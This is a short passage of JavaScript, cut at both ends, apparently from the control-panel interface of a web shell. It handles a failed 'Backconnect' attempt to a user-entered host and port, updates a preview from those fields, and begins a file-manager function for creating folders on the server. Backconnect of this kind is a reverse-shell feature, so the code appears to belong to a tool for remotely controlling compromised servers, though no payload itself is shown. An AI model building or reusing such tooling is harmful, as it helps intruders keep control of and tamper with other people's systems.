ess', 5000, 'applepay');
        } else {
            resDiv.innerHTML = '<span style="color: #f85149;">Error: ' + (r.err || 'Unknown') + '</span>';
            showToast('Backconnect failed: ' + (r.err || 'Unknown'), 'error');
            playFailSound();
        }
    });
}
// Event listeners for preview update
document.getElementById('bcHost').addEventListener('input', updateBcPreview);
document.getElementById('bcPort').addEventListener('input', updateBcPreview);

// === CREATE FOLDER ===
function showCreateFolderModal() {
    document.getElementById('newFolderName').value = '';
    document.getElementById('createFolderModal').classList.remove('hidden');
    setTimeout(function() { document.getElementById('newFolderName').focus(); }, 100);
}
function doCreateFolder() {
    var name = document.getElementById('newFolderName').value.trim();
    if (!name) { showToast('Please enter a folder name', 'warning'); return; }
    fileActionRequest({file_action: 'create_folder', folder_name: na